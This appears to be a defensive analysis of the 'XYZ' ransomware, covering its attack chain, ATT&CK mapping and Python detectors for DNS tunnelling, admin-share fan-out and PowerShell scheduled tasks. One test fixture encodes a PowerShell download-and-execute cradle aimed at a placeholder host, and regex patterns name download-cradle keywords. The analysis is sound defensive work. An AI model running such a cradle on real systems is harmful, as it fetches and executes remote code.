In-Depth Analysis of the XYZ Ransomware: An Investigative Report

Daniel Osei — SOC Lead & Malware Analyst

Key Takeaways

  • XYZ executes through PowerShell, persists through a scheduled task that relaunches the payload after a reboot, and runs that payload inside a hollowed legitimate process to evade antivirus.
  • Indicators of compromise (IOCs) include file hashes for the dropper and payload and registry changes tied to payload delivery.
  • Command and control (C2) traffic mixes HTTP GET requests with DNS tunneling to dynamically generated domains that live for less than 24 hours, so static blocklists lag behind the infrastructure.

Executive Summary

Our investigation into the recent wave of attacks attributed to the XYZ ransomware found a structured attack chain. Initial access came through targeted phishing that delivered a dropper; once executed, the dropper deployed the ransomware payload. The observed behaviour maps onto MITRE ATT&CK techniques from initial access through impact (see the mapping below), and the campaign's objective was disruption of the victim followed by extortion.

Initial Access

The attack chain began with a targeted phishing e-mail carrying a Microsoft Office document with an embedded malicious macro. Opening the document prompted the victim to enable macros; if enabled, the macro ran a PowerShell command that downloaded the dropper from a remote host. The dropper wrote its files to the user's temporary directory, C:\Users\%USERNAME%\AppData\Local\Temp\.

Execution & Persistence

Once the dropper ran, it immediately registered a scheduled task so that the infection survives reboots. The task definition was stored under C:\Windows\System32\Tasks\, and its action ran a PowerShell command that launched the ransomware payload, chaining the stages of the infection. To evade antivirus, the ransomware used process hollowing: a legitimate process is started in a suspended state, its in-memory image is replaced with the payload, and execution is resumed, so the malicious code runs under a trusted process name.

Command and Control

The sample began communicating with its command and control (C2) server shortly after execution, using a combination of HTTP GET requests and DNS tunneling over dynamically generated domains. The domains we observed in the network traffic lived for less than 24 hours each, so incident response teams cannot block every C2 endpoint with a static blocklist. Domain names extracted from the sample included exampledynamicdomain1.com and exampledynamicdomain2.com.
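The beaconing pattern above, many distinct high-entropy subdomains under a domain nobody in the estate has resolved before, often carried in TXT queries, can be scored directly from resolver logs. The following Python is an added example written for this report; it is not code from the original analysis or from the malware. The log format, the baseline set, the thresholds, the client addresses and the query names are all constructed, and the two exampledynamicdomain names are used only as placeholders, as they are in the report. It treats the last two labels as the registered domain, which is a simplification; production code should use the Public Suffix List.

```python
"""Score resolver logs for DNS tunnelling and newly seen domains.

Added example for this report; not code from the original analysis. The log
format, baseline, thresholds and query names are constructed, and the
exampledynamicdomain names are placeholders taken from the report.
"""
import math
from collections import defaultdict

# Constructed sample log, one query per line: "<epoch> <client_ip> <qname> <qtype>".
SAMPLE_LOG = """\
1700000001 10.0.0.12 www.contoso-intranet.local A
1700000003 10.0.0.12 img1.static-example.net A
1700000004 10.0.0.12 img2.static-example.net A
1700000005 10.0.0.12 img3.static-example.net A
1700000006 10.0.0.12 img4.static-example.net A
1700000007 10.0.0.12 img5.static-example.net A
1700000010 10.0.0.37 a1b2c3d4e5f6a7b8c9d0.exampledynamicdomain1.com TXT
1700000011 10.0.0.37 f0e9d8c7b6a5f4e3d2c1.exampledynamicdomain1.com TXT
1700000012 10.0.0.37 0a1b2c3d4e5f6a7b8c9d.exampledynamicdomain1.com TXT
1700000013 10.0.0.37 9f8e7d6c5b4a39281706.exampledynamicdomain1.com TXT
1700000014 10.0.0.37 1e2d3c4b5a69788796a5.exampledynamicdomain1.com TXT
1700000015 10.0.0.37 b4c5d6e7f8091a2b3c4d.exampledynamicdomain1.com TXT
1700000016 10.0.0.37 7c3e9a1f5b2d8e4c6a0b.exampledynamicdomain2.com A
1700000017 10.0.0.37 2f8b4d6e0a9c1e3b5d7f.exampledynamicdomain2.com A
"""

# Constructed baseline: registered domains the estate is known to resolve.
BASELINE = {"contoso-intranet.local", "static-example.net"}

# Illustrative thresholds, not tuned values. Both must be met to flag tunnelling.
MIN_UNIQUE_SUBDOMAINS = 5   # volume: many distinct labels under one domain
MIN_MEAN_ENTROPY = 3.2      # randomness: bits per character of the left label


def shannon_entropy(label: str) -> float:
    """Shannon entropy (bits per character) of one DNS label."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str):
    """Return (leftmost label or None, registered domain).

    Simplification: the registered domain is the last two labels. Real code
    should use the Public Suffix List so that e.g. example.co.uk is handled.
    """
    labels = qname.rstrip(".").lower().split(".")
    left = labels[0] if len(labels) > 2 else None
    return left, ".".join(labels[-2:])


def score_domains(log_text: str) -> dict:
    """Aggregate queries per registered domain into tunnelling indicators."""
    stats = defaultdict(lambda: {"subs": set(), "ent": [], "txt": 0, "total": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, _client, qname, qtype = line.split()
        left, domain = split_name(qname)
        s = stats[domain]
        s["total"] += 1
        if qtype in ("TXT", "NULL"):      # record types favoured for bulk data
            s["txt"] += 1
        if left is not None:
            s["subs"].add(left)
            s["ent"].append(shannon_entropy(left))
    report = {}
    for domain, s in stats.items():
        mean_ent = sum(s["ent"]) / len(s["ent"]) if s["ent"] else 0.0
        report[domain] = {
            "unique_subdomains": len(s["subs"]),
            "mean_entropy": round(mean_ent, 2),
            "txt_ratio": round(s["txt"] / s["total"], 2),
            "new_domain": domain not in BASELINE,
        }
    return report


def flag_tunnelling(report: dict) -> set:
    """Domains that show both high subdomain volume and high label entropy."""
    return {d for d, r in report.items()
            if r["unique_subdomains"] >= MIN_UNIQUE_SUBDOMAINS
            and r["mean_entropy"] >= MIN_MEAN_ENTROPY}


def new_domains(report: dict) -> set:
    """Domains absent from the baseline: candidates for the short-lived C2 domains."""
    return {d for d, r in report.items() if r["new_domain"]}


if __name__ == "__main__":
    rep = score_domains(SAMPLE_LOG)
    print("tunnelling:", sorted(flag_tunnelling(rep)))
    print("not in baseline:", sorted(new_domains(rep)))
```

Two points the sample is built to show. static-example.net has five distinct subdomains, so volume alone would flag a CDN-style pattern; the entropy condition is what separates it from the random labels under exampledynamicdomain1.com. Conversely, exampledynamicdomain2.com is reported as new but not as tunnelling, because two queries do not reach the volume threshold: a low-and-slow beacon is only caught by the newly-seen-domain check or by aggregating over a longer window.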

Lateral Movement & Discovery

After execution, the actor moved laterally to extend the compromise within the network. Using valid account credentials, the ransomware attempted to propagate over SMB to administrative shares such as \\TARGETMACHINE\C$, and we also found traces of SMB exploitation. Alongside this, the actor queried Active Directory to enumerate user accounts and reachable systems.
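Because Security Event ID 5140 (network share object accessed) is written on the host whose share was touched, a single source reaching C$ or ADMIN$ on several hosts in quick succession only becomes visible as fan-out once the events are centralised. The Python below is an added example, not part of the original report: the records are constructed in the shape of 5140 events, and the hostnames, addresses, allowlist, window and threshold are assumptions.

```python
"""Flag admin-share fan-out consistent with ransomware propagation over SMB.

Added example; not code from the original report. The records below are
constructed in the shape of Security Event ID 5140 (network share object
accessed). Hostnames, addresses, the allowlist and the threshold are assumed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Drive-letter shares (C$, D$) and ADMIN$. IPC$ is excluded on purpose: ordinary
# authentication touches it constantly and it carries no file payload.
ADMIN_SHARE = re.compile(r"^\\\\\*\\(?:[A-Z]\$|ADMIN\$)$", re.IGNORECASE)

# Constructed allowlist: hosts expected to reach admin shares (backup, patching).
ALLOWED_SOURCES = {"10.0.0.5"}

FANOUT_THRESHOLD = 3          # distinct targets one actor may touch per window
WINDOW = timedelta(minutes=10)


def _ev(time, computer, user, ip, share):
    """One constructed 5140 record. 5140 is logged on the target host, so
    Computer is the destination and IpAddress the source of the SMB session."""
    return {"EventID": 5140, "TimeCreated": time, "Computer": computer,
            "SubjectUserName": user, "IpAddress": ip, "ShareName": share}


SAMPLE_EVENTS = [
    # backup account from an allowlisted host: expected, excluded
    _ev("2024-05-02T03:10:05", "FS-01", "svc_backup", "10.0.0.5", r"\\*\C$"),
    _ev("2024-05-02T03:10:09", "FS-02", "svc_backup", "10.0.0.5", r"\\*\C$"),
    _ev("2024-05-02T03:10:14", "WS-101", "svc_backup", "10.0.0.5", r"\\*\C$"),
    # an earlier, isolated access by jdoe, outside the later burst
    _ev("2024-05-02T02:00:00", "WS-200", "jdoe", "10.0.0.37", r"\\*\C$"),
    # a workstation hitting C$/ADMIN$ on four hosts in ten seconds
    _ev("2024-05-02T03:41:10", "WS-101", "jdoe", "10.0.0.37", r"\\*\C$"),
    _ev("2024-05-02T03:41:12", "WS-102", "jdoe", "10.0.0.37", r"\\*\C$"),
    _ev("2024-05-02T03:41:15", "WS-103", "jdoe", "10.0.0.37", r"\\*\ADMIN$"),
    _ev("2024-05-02T03:41:20", "FS-01", "jdoe", "10.0.0.37", r"\\*\C$"),
    # ordinary file-share use and a single admin-share access: below threshold
    _ev("2024-05-02T03:50:00", "FS-01", "asmith", "10.0.0.40", r"\\*\Finance"),
    _ev("2024-05-02T03:52:00", "WS-110", "asmith", "10.0.0.40", r"\\*\C$"),
]


def admin_share_accesses(events):
    """Yield 5140 events on admin shares from sources outside the allowlist."""
    for ev in events:
        if (ev["EventID"] == 5140 and ADMIN_SHARE.match(ev["ShareName"])
                and ev["IpAddress"] not in ALLOWED_SOURCES):
            yield ev


def fanout_by_actor(events) -> dict:
    """Per (source IP, account): most distinct targets touched inside WINDOW."""
    by_actor = defaultdict(list)
    for ev in admin_share_accesses(events):
        key = (ev["IpAddress"], ev["SubjectUserName"].lower())
        by_actor[key].append((datetime.fromisoformat(ev["TimeCreated"]),
                              ev["Computer"].upper()))
    result = {}
    for key, hits in by_actor.items():
        hits.sort()
        best, best_targets = 0, set()
        for i, (t0, _) in enumerate(hits):
            # sliding window anchored on each access in time order
            targets = {host for t, host in hits[i:] if t - t0 <= WINDOW}
            if len(targets) > best:
                best, best_targets = len(targets), targets
        result[key] = {"max_targets_in_window": best,
                       "targets": sorted(best_targets)}
    return result


def flag_propagation(events, threshold=FANOUT_THRESHOLD) -> dict:
    """Actors whose admin-share fan-out reaches the threshold."""
    return {k: r for k, r in fanout_by_actor(events).items()
            if r["max_targets_in_window"] >= threshold}


if __name__ == "__main__":
    for (ip, user), r in flag_propagation(SAMPLE_EVENTS).items():
        print(f"{user}@{ip} touched {r['max_targets_in_window']} hosts: {r['targets']}")
```

The allowlist is what keeps legitimate backup and patching traffic quiet, so it has to be maintained deliberately; an attacker who obtains the backup account's credentials from an allowlisted host would pass this check, which is why the account and the source address are keyed together. 5140 is only written when the File Share subcategory of Object Access auditing is enabled on the target hosts; without it there is nothing to centralise.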

Impact & Objectives

The objective of the XYZ campaign was financial gain through extortion. On execution the ransomware encrypted files across the infected systems, including directories such as C:\Users\Public\Documents\ and C:\Program Files\, and then displayed a ransom note demanding payment in cryptocurrency. The note also threatened to publish data exfiltrated before encryption if the demand was not met, adding leak pressure on top of the encryption itself.

MITRE ATT&CK Mapping

  • T1566.001 – Phishing: Spearphishing Attachment: targeted e-mail carrying a macro-enabled Office document.
  • T1204.002 – User Execution: Malicious File: the victim enables macros, which runs the downloader.
  • T1059.001 – Command and Scripting Interpreter: PowerShell (formerly T1086): PowerShell downloads the dropper and later launches the payload from the scheduled task.
  • T1053.005 – Scheduled Task/Job: Scheduled Task: task created for persistence across reboots.
  • T1055.012 – Process Injection: Process Hollowing: payload run inside a hollowed legitimate process to evade antivirus.
  • T1071.001 – Application Layer Protocol: Web Protocols: HTTP GET beacons to C2.
  • T1071.004 – Application Layer Protocol: DNS: DNS tunneling to C2.
  • T1568 – Dynamic Resolution: dynamically generated C2 domains with a lifespan under 24 hours.
  • T1021.002 – Remote Services: SMB/Windows Admin Shares: propagation to C$ shares using valid credentials.
  • T1087.002 – Account Discovery: Domain Account: Active Directory queries for user accounts.
  • T1018 – Remote System Discovery: Active Directory queries for reachable systems.
  • T1569.002 – System Services: Service Execution (formerly T1035): use of legitimate services for code execution.
  • T1486 – Data Encrypted for Impact: file encryption followed by a ransom demand.

Detection Opportunities

  • Alert on scheduled-task creation (Security Event ID 4698, or Event ID 106 in Microsoft-Windows-TaskScheduler/Operational) whose action runs powershell.exe, in particular with -EncodedCommand, -WindowStyle Hidden or a download cradle; file creation under C:\Windows\System32\Tasks\ (Sysmon Event ID 11) catches the same task registration.
  • Alert on Office processes (WINWORD.EXE, EXCEL.EXE) spawning powershell.exe (Sysmon Event ID 1, or Security Event ID 4688 with command-line auditing enabled), which is the macro-to-dropper step of this chain.
  • Baseline DNS and flag newly seen domains that receive many distinct high-entropy subdomain queries, especially TXT or NULL records; because the C2 domains live under 24 hours, detection at the resolver is more durable than domain blocklists.
  • Watch for a single workstation or account accessing C$ or ADMIN$ on multiple hosts within a short window (Security Event ID 5140/5145 on the targets), which is how the ransomware spread with valid credentials.
  • On endpoints, look for process hollowing indicators (a process created suspended followed by remote memory writes, or an in-memory image that does not match the on-disk file) and for executables written to %LOCALAPPDATA%\Temp.
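The persistence described under Execution & Persistence and the scheduled-task detection opportunity above can both be checked against Security Event ID 4698, whose TaskContent field carries the task's XML, including the Exec action's Command and Arguments. The following Python is an added example, not code from the original report or from the malware. The 4698 records, the task names, the example.invalid URL and the indicator weights are constructed; the Task Scheduler XML namespace and element names are the real ones. Decoding the -EncodedCommand argument matters because the cradle is otherwise invisible to a string match on the task definition.

```python
"""Triage Event ID 4698 (scheduled task created) for PowerShell persistence.

Added example; not code from the original report. The records are constructed
in the shape of 4698, whose TaskContent field carries the Task Scheduler XML.
Task names, the example.invalid URL and the indicator weights are assumptions.
"""
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"
POWERSHELL = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", re.IGNORECASE)
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)",
                         re.IGNORECASE)
# (reason, weight, pattern) applied to the arguments plus any decoded command.
INDICATORS = [
    ("encoded command", 2, ENCODED_ARG),
    ("hidden window", 1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)),
    ("execution policy bypass", 1,
     re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.IGNORECASE)),
    ("download cradle", 2, re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
        r"|Invoke-Expression|\biex\b|Start-BitsTransfer", re.IGNORECASE)),
    ("payload in user temp", 1,
     re.compile(r"\\AppData\\Local\\Temp\\|%TEMP%", re.IGNORECASE)),
]
PERSISTENT_TRIGGERS = {"BootTrigger", "LogonTrigger"}   # survive a reboot
ALERT_THRESHOLD = 3

# A download cradle hidden behind -EncodedCommand (PowerShell expects UTF-16LE).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16le")).decode()
DAILY = "<CalendarTrigger><ScheduleByDay/></CalendarTrigger>"


def _rec(user, name, trigger, command, arguments):
    """One constructed 4698 record with a minimal Task Scheduler XML body."""
    xml = (f'<Task xmlns="{TASK_NS}"><Triggers>{trigger}</Triggers>'
           f'<Actions Context="Author"><Exec><Command>{escape(command)}</Command>'
           f'<Arguments>{escape(arguments)}</Arguments></Exec></Actions></Task>')
    return {"EventID": 4698, "SubjectUserName": user, "TaskName": name, "TaskContent": xml}


SAMPLE_EVENTS = [
    _rec("SYSTEM", r"\Microsoft\Office\Office Automatic Updates 2.0", DAILY,
         r"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe",
         "/update user"),
    _rec("itadmin", r"\Maintenance\Cleanup", DAILY, "powershell.exe",
         r"-NoProfile -File C:\Scripts\Cleanup.ps1"),
    _rec("bob", r"\OneDriveSync", "<BootTrigger/>", "powershell.exe",
         f"-NoProfile -WindowStyle Hidden -EncodedCommand {ENCODED}"),
    _rec("bob", r"\Updater", "<LogonTrigger/>",
         r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"-NoProfile -w hidden -ep bypass -File C:\Users\bob\AppData\Local\Temp\update.ps1"),
]


def decode_encoded_command(arguments: str) -> str:
    """Plaintext behind -EncodedCommand / -enc / -e, or '' if absent or invalid."""
    m = ENCODED_ARG.search(arguments)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def parse_task(task_xml: str):
    """Return (trigger element names, Exec Command, Exec Arguments)."""
    root = ET.fromstring(task_xml)
    ns = f"{{{TASK_NS}}}"
    triggers = {t.tag.replace(ns, "") for trig in root.iter(ns + "Triggers") for t in trig}
    command = (root.findtext(f".//{ns}Command") or "").strip()
    arguments = (root.findtext(f".//{ns}Arguments") or "").strip()
    return triggers, command, arguments


def triage_event(ev: dict) -> dict:
    """Score one 4698 record; tasks whose action is not PowerShell score 0."""
    triggers, command, arguments = parse_task(ev["TaskContent"])
    result = {"task": ev["TaskName"], "user": ev["SubjectUserName"], "score": 0, "reasons": []}
    if not POWERSHELL.search(command):
        return result
    decoded = decode_encoded_command(arguments)
    text = arguments + "\n" + decoded        # scan the visible and the hidden half
    for reason, weight, pattern in INDICATORS:
        if pattern.search(text):
            result["score"] += weight
            result["reasons"].append(reason)
    persistent = triggers & PERSISTENT_TRIGGERS
    if persistent:
        result["score"] += 1
        result["reasons"].append("runs at " + "/".join(sorted(persistent)))
    if decoded:
        result["decoded"] = decoded
    return result


def flag_tasks(events, threshold=ALERT_THRESHOLD) -> list:
    """4698 records whose task scores at or above the alert threshold."""
    return [r for r in (triage_event(e) for e in events if e["EventID"] == 4698)
            if r["score"] >= threshold]


if __name__ == "__main__":
    for r in flag_tasks(SAMPLE_EVENTS):
        print(r["task"], r["score"], r["reasons"])
```

The weights are deliberately additive rather than a single "PowerShell in a scheduled task" rule: the itadmin cleanup task in the sample is PowerShell too, and scores zero because nothing about it is hidden, encoded, or fetched from the network. Short-form switches (-w, -ep, -e, -enc) are matched alongside the long forms because abbreviated switches are a common way to slip past string-based rules.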

Analyst Notes

The XYZ actors adapt to the defences commonly found in the environments they target. Proactive monitoring for the behaviours listed above, user training to recognise phishing, and an incident response plan with specific procedures for ransomware incidents substantially reduce the risk from similar attacks.

Source: Original Report